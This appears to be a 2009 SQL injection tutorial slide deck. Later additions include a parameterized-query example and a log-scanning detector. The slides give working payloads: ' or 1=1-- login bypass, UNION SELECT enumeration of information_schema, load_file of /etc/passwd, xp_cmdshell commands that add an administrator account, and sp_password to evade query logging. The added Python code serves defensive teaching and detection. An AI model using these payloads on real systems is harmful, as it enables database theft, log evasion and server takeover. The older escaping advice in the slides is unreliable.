8/11/2019 SQL Injection Slide
by : nazRuL [at] delaforta.net
27 March 2009
Introduction
SQL INJECTION
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
Simple Concept
or 1=1--
or =
' or 1=1#
') or '1'='1--
' or 1=1/*
admin'/*
etc.....
MySQL Injection
1. Unvalidated input
2. Adding a quotation mark
3. Testing with an AND query
INJECTION...
Find the number of tables
=> ORDER BY
Find the column positions => UNION SELECT
Find table names
> information_schema > limit
> group_concat
INJECTION (continued...)
Find column names
> information_schema
> table_name == hex string > limit
> group_concat
* Let's get the XxX..
THE SECRET
BEHIND
the information_schema table
* Magic Query
.:. load_file(/path/file);
ex : /etc/passwd
.:. into dumpfile (/path/file);
Ex : /tmp/blabla > perm 777
/known/path/
Advanced...
MS-SQL Injection
1. Unvalidated input
2. Adding a quotation mark
3. Testing with an AND query
INJECTION...
Finding table names
=> having 1=1--
(exploiting the SQL query error)
Exploiting the group by query
=> (group by table,table having 1=1--)
INJECTION...
DATA MANIPULATION
* UPDATE
(update table_name set column2 where column1=n)
* INSERT
(insert into table_name values(n,value))
* DROP (drop table table_name)
* SHUTDOWN
* Magic Query
.:. Check user status
convert(int,(select+user));--
.:. CMD shell query
* exec+master..xp_cmdshell net user uname pass /add
* exec+master..xp_cmdshell net localgroup administrator uname /add
Advanced...
Prevention
- PHP based
1. Convert everything to Int
2. Magic quotes Off
3.
4. addslashes function
- ASP based
1. Replace to
2. SQL Error Handling
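The prevention list above stays at the level of keywords, so the following added example (written for this page; it is not code from the slides or their author) shows the two ideas in working form with Python's built-in sqlite3 module and a constructed users table: a login query built by string concatenation that the slide 3 payload ' or 1=1-- turns into a tautology, beside the same query written with driver placeholders, plus an id lookup that casts to int before the value reaches SQL ("Convert everything to Int"). The table, column and function names are this example's own assumptions.

```python
import sqlite3

# Constructed sample data for the example (not from the slides);
# plaintext passwords only to keep the example short
SAMPLE_USERS = [(1, "admin", "s3cret"), (2, "alice", "wonderland")]


def make_db():
    """Create an in-memory database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation (the weakness slide 2 describes).

    A quote in the input closes the string literal, so the slide 3 payload
    ' or 1=1-- makes the WHERE clause always true and comments out the
    password comparison.
    """
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (
        username,
        password,
    )
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, username, password):
    """Same query with driver placeholders.

    The values travel separately from the statement text, so a quote in the
    input is compared as data and never becomes part of the SQL grammar.
    """
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def get_user_by_id(conn, raw_id):
    """Slide 13, 'Convert everything to Int': cast before the value reaches SQL.

    Anything that is not a plain integer (e.g. '1 or 1=1') is rejected here,
    and the cast value is still bound through a placeholder.
    """
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("concatenated query, payload as username:", login_vulnerable(db, payload, "x"))
    print("parameterized query, same payload:", login_safe(db, payload, "x"))
    print("id lookup with '2':", get_user_by_id(db, "2"))
    print("id lookup with '1 or 1=1':", get_user_by_id(db, "1 or 1=1"))
```

Placeholders are preferable to the addslashes approach on the slide because escaping helpers depend on the connection's character set and on being applied to every single input, while a bound parameter can never change the statement's structure.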
Blind SQL Injection
Definition....
Blind-SQL
# Finding table_admin, username or password #
UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES
=> WHERE+table_name+NOT+IN+(table_yg_muncul)
UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=table_yg_diinginkan
=> WHERE+table_name='user'+AND+column_name+NOT+IN+(column_yg_muncul)
UNION+SELECT+1,2,user,pass,4+FROM+table_admin
# Tips
# Using concatenation to display fields with many column names
ID+:+username+:+userpass
(ID%2B':'%2Busername%2B':'%2Buserpass)
# Using --sp_password
sp_password makes MSSQL not log the query in MSSQL (it is probably only logged on the server)
> often found in web applications: asp, cfm, aspx, etc..
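The slides list the query fragments the technique relies on: ORDER BY and UNION SELECT probing, information_schema with limit and group_concat, load_file and into dumpfile, having 1=1 for MS-SQL error messages, convert(int,...), xp_cmdshell, and the --sp_password logging trick in the tips. From the defender's side those same fragments are what a log review looks for. The following is an added example, not part of the original slides: a Python scanner that reads web-server access-log lines in the common log format, URL-decodes the query string (so the + and %2B encodings shown in the tips resolve before matching), and tags each request with the fragments it contains. The log lines are constructed for the example, and the signature names and the scan_log function are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Query fragments taken from the slides, matched after URL decoding.
# The labels are this example's own names, not terms from the slides.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),            # ' or 1=1--
    "order_by": re.compile(r"\border\s+by\b", re.I),                   # column-count probing
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I),
    "having_error": re.compile(r"\bhaving\s+1\s*=\s*1", re.I),         # MS-SQL error-based
    "convert_int": re.compile(r"\bconvert\s*\(\s*int\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "sp_password": re.compile(r"\bsp_password\b", re.I),               # query-logging evasion
}

# Constructed access-log lines for the example (not real traffic)
SAMPLE_LOG = """\
10.0.0.5 - - [27/Mar/2009:10:01:02 +0700] "GET /news.php?id=5 HTTP/1.1" 200 1234
10.0.0.9 - - [27/Mar/2009:10:01:05 +0700] "GET /login.php?user=admin'+or+1=1--&pass=x HTTP/1.1" 302 0
10.0.0.9 - - [27/Mar/2009:10:01:09 +0700] "GET /news.php?id=5+order+by+10-- HTTP/1.1" 500 321
10.0.0.9 - - [27/Mar/2009:10:01:15 +0700] "GET /news.php?id=-5+union+select+1,2,group_concat(table_name),4+from+information_schema.tables-- HTTP/1.1" 200 4567
10.0.0.9 - - [27/Mar/2009:10:01:22 +0700] "GET /list.asp?id=1;exec+master..xp_cmdshell+'whoami'--sp_password HTTP/1.1" 500 100
10.0.0.7 - - [27/Mar/2009:10:02:00 +0700] "GET /search.php?q=order+form HTTP/1.1" 200 800
""".splitlines()


def decode_request(target):
    """Split the request target into path and URL-decoded query string."""
    path, _, query = target.partition("?")
    return path, unquote_plus(query)  # '+' -> space, '%2B' -> '+', '%27' -> "'"


def classify(query):
    """Return the names of every signature that matches the decoded query."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(lines):
    """Parse each log line and report requests that carry injection fragments."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        ip, when, method, target, status = m.groups()
        path, query = decode_request(target)
        tags = classify(query)
        if tags:
            hits.append({"ip": ip, "time": when, "method": method,
                         "path": path, "status": status, "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['path']} status={hit['status']} -> {', '.join(hit['tags'])}")
```

Decoding before matching is the important step: the payloads arrive with + for spaces and the tips slide encodes + itself as %2B, so a rule applied to the raw line would miss them. A 500 status on a tagged request is a useful second signal, since the having 1=1 technique on slide 10 depends on provoking database errors, and a burst of ORDER BY requests with increasing numbers from one address is the column-count probing from slide 5.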